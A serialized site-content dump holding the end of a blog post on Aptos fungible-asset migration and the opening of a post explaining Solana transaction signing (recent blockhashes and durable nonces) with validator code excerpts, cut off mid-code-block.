string",{"type":24,"tag":301,"props":73924,"children":73925},{"style":385},[73926],{"type":30,"value":10308},{"type":24,"tag":301,"props":73928,"children":73929},{"style":314},[73930],{"type":30,"value":73931},"utf8",{"type":24,"tag":301,"props":73933,"children":73934},{"style":359},[73935],{"type":30,"value":362},{"type":24,"tag":301,"props":73937,"children":73938},{"style":329},[73939],{"type":30,"value":73940},"b\"\"",{"type":24,"tag":301,"props":73942,"children":73943},{"style":359},[73944],{"type":30,"value":4656},{"type":24,"tag":301,"props":73946,"children":73947},{"class":303,"line":476},[73948,73952,73956,73960,73964,73968],{"type":24,"tag":301,"props":73949,"children":73950},{"style":359},[73951],{"type":30,"value":73922},{"type":24,"tag":301,"props":73953,"children":73954},{"style":385},[73955],{"type":30,"value":10308},{"type":24,"tag":301,"props":73957,"children":73958},{"style":314},[73959],{"type":30,"value":73931},{"type":24,"tag":301,"props":73961,"children":73962},{"style":359},[73963],{"type":30,"value":362},{"type":24,"tag":301,"props":73965,"children":73966},{"style":329},[73967],{"type":30,"value":73940},{"type":24,"tag":301,"props":73969,"children":73970},{"style":359},[73971],{"type":30,"value":4656},{"type":24,"tag":301,"props":73973,"children":73974},{"class":303,"line":495},[73975],{"type":24,"tag":301,"props":73976,"children":73977},{"style":359},[73978],{"type":30,"value":589},{"type":24,"tag":301,"props":73980,"children":73981},{"class":303,"line":504},[73982,73986,73990],{"type":24,"tag":301,"props":73983,"children":73984},{"style":359},[73985],{"type":30,"value":541},{"type":24,"tag":301,"props":73987,"children":73988},{"style":385},[73989],{"type":30,"value":4054},{"type":24,"tag":301,"props":73991,"children":73992},{"style":359},[73993],{"type":30,"value":4059},{"type":24,"tag":32,"props":73995,"children":73996},{},[73997,73999,74004],{"type":30,"value":73998},"When the linked fungible asset was created, the current ",{"type":24,"tag":145,"props":74000,"children":74002},{"className":74001},[],[74003],{"type":30,"value":67679},{"type":30,"value":74005}," supply was incorrectly passed as the maximum fungible asset supply, preventing the minting of additional fungible assets beyond the existing coin circulation.",{"type":24,"tag":32,"props":74007,"children":74008},{},[74009,74011,74016,74018,74024,74026,74031],{"type":30,"value":74010},"Users can manually migrate their ",{"type":24,"tag":145,"props":74012,"children":74014},{"className":74013},[],[74015],{"type":30,"value":67841},{"type":30,"value":74017}," to a primary fungible store. This creates a store for the paired fungible asset (if one doesn’t exist) and removes the ",{"type":24,"tag":145,"props":74019,"children":74021},{"className":74020},[],[74022],{"type":30,"value":74023},"\u003CCoinStore\u003CCoinType>>",{"type":30,"value":74025}," from the caller. All coins in the ",{"type":24,"tag":145,"props":74027,"children":74029},{"className":74028},[],[74030],{"type":30,"value":67841},{"type":30,"value":74032}," are exchanged and transferred to the new store during the migration.",{"type":24,"tag":291,"props":74034,"children":74036},{"className":9818,"code":74035,"language":9817,"meta":7,"style":7},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\npublic entry fun migrate_to_fungible_store\u003CCoinType>(\n account: &signer\n) acquires CoinStore, CoinConversionMap, CoinInfo {\n maybe_convert_to_fungible_store\u003CCoinType>(signer::address_of(account));\n}\n",[74037],{"type":24,"tag":145,"props":74038,"children":74039},{"__ignoreMap":7},[74040,74048,74080,74100,74136,74177],{"type":24,"tag":301,"props":74041,"children":74042},{"class":303,"line":304},[74043],{"type":24,"tag":301,"props":74044,"children":74045},{"style":1062},[74046],{"type":30,"value":74047},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\n",{"type":24,"tag":301,"props":74049,"children":74050},{"class":303,"line":320},[74051,74055,74059,74063,74068,74072,74076],{"type":24,"tag":301,"props":74052,"children":74053},{"style":369},[74054],{"type":30,"value":68388},{"type":24,"tag":301,"props":74056,"children":74057},{"style":369},[74058],{"type":30,"value":69354},{"type":24,"tag":301,"props":74060,"children":74061},{"style":369},[74062],{"type":30,"value":13026},{"type":24,"tag":301,"props":74064,"children":74065},{"style":369},[74066],{"type":30,"value":74067}," migrate_to_fungible_store",{"type":24,"tag":301,"props":74069,"children":74070},{"style":359},[74071],{"type":30,"value":1849},{"type":24,"tag":301,"props":74073,"children":74074},{"style":10246},[74075],{"type":30,"value":13402},{"type":24,"tag":301,"props":74077,"children":74078},{"style":359},[74079],{"type":30,"value":13407},{"type":24,"tag":301,"props":74081,"children":74082},{"class":303,"line":335},[74083,74087,74091,74095],{"type":24,"tag":301,"props":74084,"children":74085},{"style":369},[74086],{"type":30,"value":31927},{"type":24,"tag":301,"props":74088,"children":74089},{"style":385},[74090],{"type":30,"value":1679},{"type":24,"tag":301,"props":74092,"children":74093},{"style":385},[74094],{"type":30,"value":991},{"type":24,"tag":301,"props":74096,"children":74097},{"style":369},[74098],{"type":30,"value":74099},"signer\n",{"type":24,"tag":301,"props":74101,"children":74102},{"class":303,"line":344},[74103,74107,74111,74115,74119,74124,74128,74132],{"type":24,"tag":301,"props":74104,"children":74105},{"style":359},[74106],{"type":30,"value":911},{"type":24,"tag":301,"props":74108,"children":74109},{"style":369},[74110],{"type":30,"value":13163},{"type":24,"tag":301,"props":74112,"children":74113},{"style":10246},[74114],{"type":30,"value":67862},{"type":24,"tag":301,"props":74116,"children":74117},{"style":359},[74118],{"type":30,"value":377},{"type":24,"tag":301,"props":74120,"children":74121},{"style":10246},[74122],{"type":30,"value":74123},"CoinConversionMap",{"type":24,"tag":301,"props":74125,"children":74126},{"style":359},[74127],{"type":30,"value":377},{"type":24,"tag":301,"props":74129,"children":74130},{"style":10246},[74131],{"type":30,"value":13532},{"type":24,"tag":301,"props":74133,"children":74134},{"style":359},[74135],{"type":30,"value":3035},{"type":24,"tag":301,"props":74137,"children":74138},{"class":303,"line":401},[74139,74144,74148,74152,74157,74161,74165,74169,74173],{"type":24,"tag":301,"props":74140,"children":74141},{"style":369},[74142],{"type":30,"value":74143}," maybe_convert_to_fungible_store",{"type":24,"tag":301,"props":74145,"children":74146},{"style":359},[74147],{"type":30,"value":1849},{"type":24,"tag":301,"props":74149,"children":74150},{"style":10246},[74151],{"type":30,"value":13402},{"type":24,"tag":301,"props":74153,"children":74154},{"style":359},[74155],{"type":30,"value":74156},">(signer",{"type":24,"tag":301,"props":74158,"children":74159},{"style":385},[74160],{"type":30,"value":10308},{"type":24,"tag":301,"props":74162,"children":74163},{"style":314},[74164],{"type":30,"value":14026},{"type":24,"tag":301,"props":74166,"children":74167},{"style":359},[74168],{"type":30,"value":362},{"type":24,"tag":301,"props":74170,"children":74171},{"style":369},[74172],{"type":30,"value":19748},{"type":24,"tag":301,"props":74174,"children":74175},{"style":359},[74176],{"type":30,"value":3416},{"type":24,"tag":301,"props":74178,"children":74179},{"class":303,"line":415},[74180],{"type":24,"tag":301,"props":74181,"children":74182},{"style":359},[74183],{"type":30,"value":698},{"type":24,"tag":32,"props":74185,"children":74186},{},[74187,74189,74194,74196,74201],{"type":30,"value":74188},"A curious reader might wonder about the fate of the ",{"type":24,"tag":145,"props":74190,"children":74192},{"className":74191},[],[74193],{"type":30,"value":67841},{"type":30,"value":74195}," \"frozen\" status during migration. Unsurprisingly tough, the \"frozen\" status of the primary fungible store is matched to that of the ",{"type":24,"tag":145,"props":74197,"children":74199},{"className":74198},[],[74200],{"type":30,"value":67841},{"type":30,"value":74202}," to ensure consistency.",{"type":24,"tag":72897,"props":74204,"children":74205},{},[74206,74225],{"type":24,"tag":32,"props":74207,"children":74208},{},[74209,74211,74216,74218,74223],{"type":30,"value":74210},"Could an attacker convert their ",{"type":24,"tag":145,"props":74212,"children":74214},{"className":74213},[],[74215],{"type":30,"value":67841},{"type":30,"value":74217}," to a primary fungible store and then register another ",{"type":24,"tag":145,"props":74219,"children":74221},{"className":74220},[],[74222],{"type":30,"value":67841},{"type":30,"value":74224}," only to convert it again to manipulate the \"frozen\" status of the linked primary fungible store?",{"type":24,"tag":72928,"props":74226,"children":74227},{"v-slot:answer-0":7},[74228],{"type":24,"tag":32,"props":74229,"children":74230},{},[74231],{"type":30,"value":74232},"The coin::register function first checks is_account_registered, which exits early if true. is_account_registered determines if the account has a primary fungible store for the linked fungible asset when the CoinStore doesn’t exist. If the fungible store has been converted, a primary fungible store and linked fungible asset will already exist, preventing re-registration.",{"type":24,"tag":43,"props":74234,"children":74235},{"id":9652},[74236],{"type":30,"value":9655},{"type":24,"tag":32,"props":74238,"children":74239},{},[74240,74242,74247],{"type":30,"value":74241},"Aptos's implementation of fungible assets does indeed resolve the original problems with ",{"type":24,"tag":145,"props":74243,"children":74245},{"className":74244},[],[74246],{"type":30,"value":67679},{"type":30,"value":206},{"type":24,"tag":32,"props":74249,"children":74250},{},[74251],{"type":30,"value":74252},"However, this solution comes with its own challenges, in part because of the numerous layers that interact with each other. Before using the fungible asset standard, it's important to understand these different APIs and potential pitfalls.",{"type":24,"tag":32,"props":74254,"children":74255},{},[74256,74258],{"type":30,"value":74257},"As a final exercise to the reader, how many different ways are there to withdraw a fungible asset?",{"type":24,"tag":22262,"props":74259,"children":74260},{},[74261],{"type":24,"tag":188,"props":74262,"children":74264},{"href":36380,"ariaDescribedBy":74263,"dataFootnoteRef":7,"id":36382},[22269],[74265],{"type":30,"value":546},{"type":24,"tag":25200,"props":74267,"children":74269},{"className":74268,"dataFootnotes":7},[25203],[74270,74275],{"type":24,"tag":43,"props":74271,"children":74273},{"className":74272,"id":22269},[25208],[74274],{"type":30,"value":25211},{"type":24,"tag":6246,"props":74276,"children":74277},{},[74278],{"type":24,"tag":2659,"props":74279,"children":74280},{"id":37122},[74281,74283,74325],{"type":30,"value":74282},"There are at least four functions that can withdraw a fungible asset:",{"type":24,"tag":2655,"props":74284,"children":74285},{},[74286,74296,74305,74315],{"type":24,"tag":2659,"props":74287,"children":74288},{},[74289],{"type":24,"tag":188,"props":74290,"children":74294},{"href":74291,"rel":74292,":style":74293},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/fungible_asset.move#L782",[192],"color: #007bff;",[74295],{"type":30,"value":70978},{"type":24,"tag":2659,"props":74297,"children":74298},{},[74299],{"type":24,"tag":188,"props":74300,"children":74303},{"href":74301,"rel":74302,":style":74293},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/dispatchable_fungible_asset.move#L74",[192],[74304],{"type":30,"value":72918},{"type":24,"tag":2659,"props":74306,"children":74307},{},[74308],{"type":24,"tag":188,"props":74309,"children":74312},{"href":74310,"rel":74311,":style":74293},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move#L157",[192],[74313],{"type":30,"value":74314},"primary_fungible_store::withdraw",{"type":24,"tag":2659,"props":74316,"children":74317},{},[74318],{"type":24,"tag":188,"props":74319,"children":74322},{"href":74320,"rel":74321,":style":74293},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/coin.move#L1091-L1098",[192],[74323],{"type":30,"value":74324},"coin::withdraw",{"type":24,"tag":188,"props":74326,"children":74328},{"href":37150,"ariaLabel":25313,"className":74327,"dataFootnoteBackref":7},[25315],[74329],{"type":30,"value":25318},{"type":24,"tag":9672,"props":74331,"children":74332},{},[74333],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":74335},[74336,74337,74338,74341,74346,74347,74348,74349],{"id":67665,"depth":320,"text":67668},{"id":68210,"depth":320,"text":68213},{"id":68769,"depth":320,"text":68772,"children":74339},[74340],{"id":69280,"depth":335,"text":69283},{"id":69537,"depth":320,"text":69540,"children":74342},[74343,74344,74345],{"id":69580,"depth":335,"text":69583},{"id":70285,"depth":335,"text":70288},{"id":71942,"depth":335,"text":71945},{"id":72473,"depth":320,"text":72476},{"id":73454,"depth":320,"text":73457},{"id":9652,"depth":320,"text":9655},{"id":22269,"depth":320,"text":25211},"content:blog:2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets",{"_path":74354,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":74355,"description":74356,"date":74357,"author":12540,"image":74358,"isFeatured":16,"onBlogPage":16,"tags":74360,"body":74361,"_type":9700,"_id":76189,"_source":9702,"_file":76190,"_stem":76191,"_extension":9705},"/blog/2025-02-22-multisig-security","Solana Multisig Security","What can teams do if their multisig signers are compromised? We explore Solana's transaction signing model and present a procedure for safe signing in the presence of malicious signers on Solana.","2025-02-22",{"src":74359,"width":12208,"height":12209},"/posts/multisig-security/title.png",[9717],{"type":21,"children":74362,"toc":76180},[74363,74376,74382,74387,74393,74406,74414,74427,74487,74509,74636,74641,74654,74666,74672,74686,74699,74713,75195,75200,75208,75222,75236,75375,75387,75393,75398,75416,75421,75426,75447,75731,75746,75934,75947,76076,76081,76086,76091,76119,76125,76130,76144,76176],{"type":24,"tag":32,"props":74364,"children":74365},{},[74366,74367,74374],{"type":30,"value":8079},{"type":24,"tag":188,"props":74368,"children":74371},{"href":74369,"rel":74370},"https://www.securityalliance.org/news/2025-02-dprk-advisory",[192],[74372],{"type":30,"value":74373},"Bybit hack",{"type":30,"value":74375}," raises an interesting question: what can teams do if their signers are compromised?",{"type":24,"tag":43,"props":74377,"children":74379},{"id":74378},"solana-signatures",[74380],{"type":30,"value":74381},"Solana Signatures",{"type":24,"tag":32,"props":74383,"children":74384},{},[74385],{"type":30,"value":74386},"We first need to understand how Solana signatures work. There are two ways to sign a Solana transaction.",{"type":24,"tag":80,"props":74388,"children":74390},{"id":74389},"recent-blockhash",[74391],{"type":30,"value":74392},"Recent Blockhash",{"type":24,"tag":32,"props":74394,"children":74395},{},[74396,74398,74405],{"type":30,"value":74397},"The most straightforward is with a \"recent blockhash\". From ",{"type":24,"tag":188,"props":74399,"children":74402},{"href":74400,"rel":74401},"https://solana.com/developers/guides/advanced/confirmation",[192],[74403],{"type":30,"value":74404},"the docs",{"type":30,"value":1679},{"type":24,"tag":9770,"props":74407,"children":74408},{},[74409],{"type":24,"tag":32,"props":74410,"children":74411},{},[74412],{"type":30,"value":74413},"During transaction processing, Solana Validators will check if each transaction's recent blockhash is recorded within the most recent 151 stored hashes (aka \"max processing age\"). If the transaction's recent blockhash is older than this max processing age, the transaction is not processed.",{"type":24,"tag":32,"props":74415,"children":74416},{},[74417,74419,74426],{"type":30,"value":74418},"The actual constant ",{"type":24,"tag":188,"props":74420,"children":74423},{"href":74421,"rel":74422},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/sdk/clock/src/lib.rs#L129-L130",[192],[74424],{"type":30,"value":74425},"is defined here",{"type":30,"value":206},{"type":24,"tag":291,"props":74428,"children":74430},{"className":9818,"code":74429,"language":9817,"meta":7,"style":7},"// The maximum age of a blockhash that will be accepted by the leader\npub const MAX_PROCESSING_AGE: usize = MAX_RECENT_BLOCKHASHES / 2;\n",[74431],{"type":24,"tag":145,"props":74432,"children":74433},{"__ignoreMap":7},[74434,74442],{"type":24,"tag":301,"props":74435,"children":74436},{"class":303,"line":304},[74437],{"type":24,"tag":301,"props":74438,"children":74439},{"style":1062},[74440],{"type":30,"value":74441},"// The maximum age of a blockhash that will be accepted by the leader\n",{"type":24,"tag":301,"props":74443,"children":74444},{"class":303,"line":320},[74445,74449,74453,74458,74462,74466,74470,74475,74479,74483],{"type":24,"tag":301,"props":74446,"children":74447},{"style":348},[74448],{"type":30,"value":20484},{"type":24,"tag":301,"props":74450,"children":74451},{"style":348},[74452],{"type":30,"value":45849},{"type":24,"tag":301,"props":74454,"children":74455},{"style":359},[74456],{"type":30,"value":74457}," MAX_PROCESSING_AGE",{"type":24,"tag":301,"props":74459,"children":74460},{"style":385},[74461],{"type":30,"value":1679},{"type":24,"tag":301,"props":74463,"children":74464},{"style":10246},[74465],{"type":30,"value":20525},{"type":24,"tag":301,"props":74467,"children":74468},{"style":385},[74469],{"type":30,"value":2537},{"type":24,"tag":301,"props":74471,"children":74472},{"style":359},[74473],{"type":30,"value":74474}," MAX_RECENT_BLOCKHASHES ",{"type":24,"tag":301,"props":74476,"children":74477},{"style":385},[74478],{"type":30,"value":1036},{"type":24,"tag":301,"props":74480,"children":74481},{"style":466},[74482],{"type":30,"value":469},{"type":24,"tag":301,"props":74484,"children":74485},{"style":359},[74486],{"type":30,"value":492},{"type":24,"tag":32,"props":74488,"children":74489},{},[74490,74492,74499,74501,74507],{"type":30,"value":74491},"For those curious, the logic ",{"type":24,"tag":188,"props":74493,"children":74496},{"href":74494,"rel":74495},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L61",[192],[74497],{"type":30,"value":74498},"starts here",{"type":30,"value":74500}," and is quite straightforward to follow, ending in a ",{"type":24,"tag":145,"props":74502,"children":74504},{"className":74503},[],[74505],{"type":30,"value":74506},"is_hash_index_valid",{"type":30,"value":74508}," check.",{"type":24,"tag":291,"props":74510,"children":74512},{"className":9818,"code":74511,"language":9817,"meta":7,"style":7},"fn is_hash_index_valid(last_hash_index: u64, max_age: usize, hash_index: u64) -> bool {\n last_hash_index - hash_index \u003C= max_age as u64\n}\n",[74513],{"type":24,"tag":145,"props":74514,"children":74515},{"__ignoreMap":7},[74516,74595,74629],{"type":24,"tag":301,"props":74517,"children":74518},{"class":303,"line":304},[74519,74523,74528,74532,74537,74541,74545,74549,74554,74558,74562,74566,74571,74575,74579,74583,74587,74591],{"type":24,"tag":301,"props":74520,"children":74521},{"style":348},[74522],{"type":30,"value":27037},{"type":24,"tag":301,"props":74524,"children":74525},{"style":314},[74526],{"type":30,"value":74527}," is_hash_index_valid",{"type":24,"tag":301,"props":74529,"children":74530},{"style":359},[74531],{"type":30,"value":362},{"type":24,"tag":301,"props":74533,"children":74534},{"style":369},[74535],{"type":30,"value":74536},"last_hash_index",{"type":24,"tag":301,"props":74538,"children":74539},{"style":385},[74540],{"type":30,"value":1679},{"type":24,"tag":301,"props":74542,"children":74543},{"style":10246},[74544],{"type":30,"value":12680},{"type":24,"tag":301,"props":74546,"children":74547},{"style":359},[74548],{"type":30,"value":377},{"type":24,"tag":301,"props":74550,"children":74551},{"style":369},[74552],{"type":30,"value":74553},"max_age",{"type":24,"tag":301,"props":74555,"children":74556},{"style":385},[74557],{"type":30,"value":1679},{"type":24,"tag":301,"props":74559,"children":74560},{"style":10246},[74561],{"type":30,"value":20525},{"type":24,"tag":301,"props":74563,"children":74564},{"style":359},[74565],{"type":30,"value":377},{"type":24,"tag":301,"props":74567,"children":74568},{"style":369},[74569],{"type":30,"value":74570},"hash_index",{"type":24,"tag":301,"props":74572,"children":74573},{"style":385},[74574],{"type":30,"value":1679},{"type":24,"tag":301,"props":74576,"children":74577},{"style":10246},[74578],{"type":30,"value":12680},{"type":24,"tag":301,"props":74580,"children":74581},{"style":359},[74582],{"type":30,"value":911},{"type":24,"tag":301,"props":74584,"children":74585},{"style":385},[74586],{"type":30,"value":882},{"type":24,"tag":301,"props":74588,"children":74589},{"style":10246},[74590],{"type":30,"value":18848},{"type":24,"tag":301,"props":74592,"children":74593},{"style":359},[74594],{"type":30,"value":3035},{"type":24,"tag":301,"props":74596,"children":74597},{"class":303,"line":320},[74598,74603,74607,74612,74616,74621,74625],{"type":24,"tag":301,"props":74599,"children":74600},{"style":369},[74601],{"type":30,"value":74602}," last_hash_index",{"type":24,"tag":301,"props":74604,"children":74605},{"style":385},[74606],{"type":30,"value":3407},{"type":24,"tag":301,"props":74608,"children":74609},{"style":369},[74610],{"type":30,"value":74611}," hash_index",{"type":24,"tag":301,"props":74613,"children":74614},{"style":385},[74615],{"type":30,"value":15012},{"type":24,"tag":301,"props":74617,"children":74618},{"style":369},[74619],{"type":30,"value":74620}," max_age",{"type":24,"tag":301,"props":74622,"children":74623},{"style":348},[74624],{"type":30,"value":15640},{"type":24,"tag":301,"props":74626,"children":74627},{"style":10246},[74628],{"type":30,"value":19991},{"type":24,"tag":301,"props":74630,"children":74631},{"class":303,"line":335},[74632],{"type":24,"tag":301,"props":74633,"children":74634},{"style":359},[74635],{"type":30,"value":698},{"type":24,"tag":32,"props":74637,"children":74638},{},[74639],{"type":30,"value":74640},"One important consequence is that any signed transaction has a natural expiration of around a few minutes.",{"type":24,"tag":9770,"props":74642,"children":74643},{},[74644],{"type":24,"tag":32,"props":74645,"children":74646},{},[74647,74649],{"type":30,"value":74648},"Since slots (aka the time period a validator can produce a block) are configured to last about 400ms, but may fluctuate between 400ms and 600ms, ",{"type":24,"tag":60,"props":74650,"children":74651},{},[74652],{"type":30,"value":74653},"a given blockhash can only be used by transactions for about 60 to 90 seconds before it will be considered expired by the runtime.",{"type":24,"tag":32,"props":74655,"children":74656},{},[74657,74659,74664],{"type":30,"value":74658},"This means an attacker ",{"type":24,"tag":5422,"props":74660,"children":74661},{},[74662],{"type":30,"value":74663},"must use",{"type":30,"value":74665}," a malicious signed transaction within a short timeframe.",{"type":24,"tag":80,"props":74667,"children":74669},{"id":74668},"durable-nonce",[74670],{"type":30,"value":74671},"Durable Nonce",{"type":24,"tag":32,"props":74673,"children":74674},{},[74675,74677,74684],{"type":30,"value":74676},"The second type of signature ",{"type":24,"tag":188,"props":74678,"children":74681},{"href":74679,"rel":74680},"https://solana.com/developers/guides/advanced/introduction-to-durable-nonces",[192],[74682],{"type":30,"value":74683},"is a durable nonce",{"type":30,"value":74685},". These were created to solve the very feature (or problem) mentioned above: short expiration time.",{"type":24,"tag":9770,"props":74687,"children":74688},{},[74689],{"type":24,"tag":32,"props":74690,"children":74691},{},[74692,74694],{"type":30,"value":74693},"durable nonces provide an opportunity to create and sign a transaction that can be submitted at any point in the future, and much more. ",{"type":24,"tag":60,"props":74695,"children":74696},{},[74697],{"type":30,"value":74698},"This opens up a wide range of use cases that are otherwise not possible or too difficult to implement",{"type":24,"tag":32,"props":74700,"children":74701},{},[74702,74704,74711],{"type":30,"value":74703},"If we examine the code ",{"type":24,"tag":188,"props":74705,"children":74708},{"href":74706,"rel":74707},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L104",[192],[74709],{"type":30,"value":74710},"for recent blockhash validation",{"type":30,"value":74712},", we can also see the handling for durable nonces.",{"type":24,"tag":291,"props":74714,"children":74716},{"className":9818,"code":74715,"language":9817,"meta":7,"style":7}," let recent_blockhash = tx.message().recent_blockhash();\n if let Some(hash_info) = hash_queue.get_hash_info_if_valid(recent_blockhash, max_age) {\n Ok(CheckedTransactionDetails {\n nonce: None,\n lamports_per_signature: hash_info.lamports_per_signature(),\n })\n } else if let Some((nonce, previous_lamports_per_signature)) = self\n .check_load_and_advance_message_nonce_account(\n tx.message(),\n next_durable_nonce,\n next_lamports_per_signature,\n )\n {\n Ok(CheckedTransactionDetails {\n nonce: Some(nonce),\n lamports_per_signature: previous_lamports_per_signature,\n })\n } else {\n error_counters.blockhash_not_found += 1;\n Err(TransactionError::BlockhashNotFound)\n }\n",[74717],{"type":24,"tag":145,"props":74718,"children":74719},{"__ignoreMap":7},[74720,74767,74833,74853,74873,74903,74911,74965,74982,75002,75014,75026,75034,75041,75060,75087,75107,75114,75129,75159,75188],{"type":24,"tag":301,"props":74721,"children":74722},{"class":303,"line":304},[74723,74727,74732,74736,74741,74745,74750,74754,74758,74763],{"type":24,"tag":301,"props":74724,"children":74725},{"style":348},[74726],{"type":30,"value":9838},{"type":24,"tag":301,"props":74728,"children":74729},{"style":369},[74730],{"type":30,"value":74731}," recent_blockhash",{"type":24,"tag":301,"props":74733,"children":74734},{"style":385},[74735],{"type":30,"value":2537},{"type":24,"tag":301,"props":74737,"children":74738},{"style":369},[74739],{"type":30,"value":74740}," tx",{"type":24,"tag":301,"props":74742,"children":74743},{"style":385},[74744],{"type":30,"value":206},{"type":24,"tag":301,"props":74746,"children":74747},{"style":314},[74748],{"type":30,"value":74749},"message",{"type":24,"tag":301,"props":74751,"children":74752},{"style":359},[74753],{"type":30,"value":20672},{"type":24,"tag":301,"props":74755,"children":74756},{"style":385},[74757],{"type":30,"value":206},{"type":24,"tag":301,"props":74759,"children":74760},{"style":314},[74761],{"type":30,"value":74762},"recent_blockhash",{"type":24,"tag":301,"props":74764,"children":74765},{"style":359},[74766],{"type":30,"value":4859},{"type":24,"tag":301,"props":74768,"children":74769},{"class":303,"line":320},[74770,74774,74778,74782,74786,74791,74795,74799,74804,74808,74813,74817,74821,74825,74829],{"type":24,"tag":301,"props":74771,"children":74772},{"style":308},[74773],{"type":30,"value":453},{"type":24,"tag":301,"props":74775,"children":74776},{"style":348},[74777],{"type":30,"value":34060},{"type":24,"tag":301,"props":74779,"children":74780},{"style":10246},[74781],{"type":30,"value":34065},{"type":24,"tag":301,"props":74783,"children":74784},{"style":359},[74785],{"type":30,"value":362},{"type":24,"tag":301,"props":74787,"children":74788},{"style":369},[74789],{"type":30,"value":74790},"hash_info",{"type":24,"tag":301,"props":74792,"children":74793},{"style":359},[74794],{"type":30,"value":911},{"type":24,"tag":301,"props":74796,"children":74797},{"style":385},[74798],{"type":30,"value":523},{"type":24,"tag":301,"props":74800,"children":74801},{"style":369},[74802],{"type":30,"value":74803}," hash_queue",{"type":24,"tag":301,"props":74805,"children":74806},{"style":385},[74807],{"type":30,"value":206},{"type":24,"tag":301,"props":74809,"children":74810},{"style":314},[74811],{"type":30,"value":74812},"get_hash_info_if_valid",{"type":24,"tag":301,"props":74814,"children":74815},{"style":359},[74816],{"type":30,"value":362},{"type":24,"tag":301,"props":74818,"children":74819},{"style":369},[74820],{"type":30,"value":74762},{"type":24,"tag":301,"props":74822,"children":74823},{"style":359},[74824],{"type":30,"value":377},{"type":24,"tag":301,"props":74826,"children":74827},{"style":369},[74828],{"type":30,"value":74553},{"type":24,"tag":301,"props":74830,"children":74831},{"style":359},[74832],{"type":30,"value":398},{"type":24,"tag":301,"props":74834,"children":74835},{"class":303,"line":335},[74836,74840,74844,74849],{"type":24,"tag":301,"props":74837,"children":74838},{"style":10246},[74839],{"type":30,"value":21603},{"type":24,"tag":301,"props":74841,"children":74842},{"style":359},[74843],{"type":30,"value":362},{"type":24,"tag":301,"props":74845,"children":74846},{"style":10246},[74847],{"type":30,"value":74848},"CheckedTransactionDetails",{"type":24,"tag":301,"props":74850,"children":74851},{"style":359},[74852],{"type":30,"value":3035},{"type":24,"tag":301,"props":74854,"children":74855},{"class":303,"line":344},[74856,74861,74865,74869],{"type":24,"tag":301,"props":74857,"children":74858},{"style":369},[74859],{"type":30,"value":74860}," nonce",{"type":24,"tag":301,"props":74862,"children":74863},{"style":385},[74864],{"type":30,"value":1679},{"type":24,"tag":301,"props":74866,"children":74867},{"style":10246},[74868],{"type":30,"value":34513},{"type":24,"tag":301,"props":74870,"children":74871},{"style":359},[74872],{"type":30,"value":1729},{"type":24,"tag":301,"props":74874,"children":74875},{"class":303,"line":401},[74876,74881,74885,74890,74894,74899],{"type":24,"tag":301,"props":74877,"children":74878},{"style":369},[74879],{"type":30,"value":74880}," lamports_per_signature",{"type":24,"tag":301,"props":74882,"children":74883},{"style":385},[74884],{"type":30,"value":1679},{"type":24,"tag":301,"props":74886,"children":74887},{"style":369},[74888],{"type":30,"value":74889}," hash_info",{"type":24,"tag":301,"props":74891,"children":74892},{"style":385},[74893],{"type":30,"value":206},{"type":24,"tag":301,"props":74895,"children":74896},{"style":314},[74897],{"type":30,"value":74898},"lamports_per_signature",{"type":24,"tag":301,"props":74900,"children":74901},{"style":359},[74902],{"type":30,"value":10318},{"type":24,"tag":301,"props":74904,"children":74905},{"class":303,"line":415},[74906],{"type":24,"tag":301,"props":74907,"children":74908},{"style":359},[74909],{"type":30,"value":74910}," })\n",{"type":24,"tag":301,"props":74912,"children":74913},{"class":303,"line":439},[74914,74918,74922,74926,74930,74934,74938,74943,74947,74952,74956,74960],{"type":24,"tag":301,"props":74915,"children":74916},{"style":359},[74917],{"type":30,"value":22565},{"type":24,"tag":301,"props":74919,"children":74920},{"style":308},[74921],{"type":30,"value":10144},{"type":24,"tag":301,"props":74923,"children":74924},{"style":308},[74925],{"type":30,"value":22574},{"type":24,"tag":301,"props":74927,"children":74928},{"style":348},[74929],{"type":30,"value":34060},{"type":24,"tag":301,"props":74931,"children":74932},{"style":10246},[74933],{"type":30,"value":34065},{"type":24,"tag":301,"props":74935,"children":74936},{"style":359},[74937],{"type":30,"value":4827},{"type":24,"tag":301,"props":74939,"children":74940},{"style":369},[74941],{"type":30,"value":74942},"nonce",{"type":24,"tag":301,"props":74944,"children":74945},{"style":359},[74946],{"type":30,"value":377},{"type":24,"tag":301,"props":74948,"children":74949},{"style":369},[74950],{"type":30,"value":74951},"previous_lamports_per_signature",{"type":24,"tag":301,"props":74953,"children":74954},{"style":359},[74955],{"type":30,"value":15649},{"type":24,"tag":301,"props":74957,"children":74958},{"style":385},[74959],{"type":30,"value":523},{"type":24,"tag":301,"props":74961,"children":74962},{"style":348},[74963],{"type":30,"value":74964}," self\n",{"type":24,"tag":301,"props":74966,"children":74967},{"class":303,"line":447},[74968,74973,74978],{"type":24,"tag":301,"props":74969,"children":74970},{"style":385},[74971],{"type":30,"value":74972}," .",{"type":24,"tag":301,"props":74974,"children":74975},{"style":314},[74976],{"type":30,"value":74977},"check_load_and_advance_message_nonce_account",{"type":24,"tag":301,"props":74979,"children":74980},{"style":359},[74981],{"type":30,"value":1707},{"type":24,"tag":301,"props":74983,"children":74984},{"class":303,"line":476},[74985,74990,74994,74998],{"type":24,"tag":301,"props":74986,"children":74987},{"style":369},[74988],{"type":30,"value":74989}," 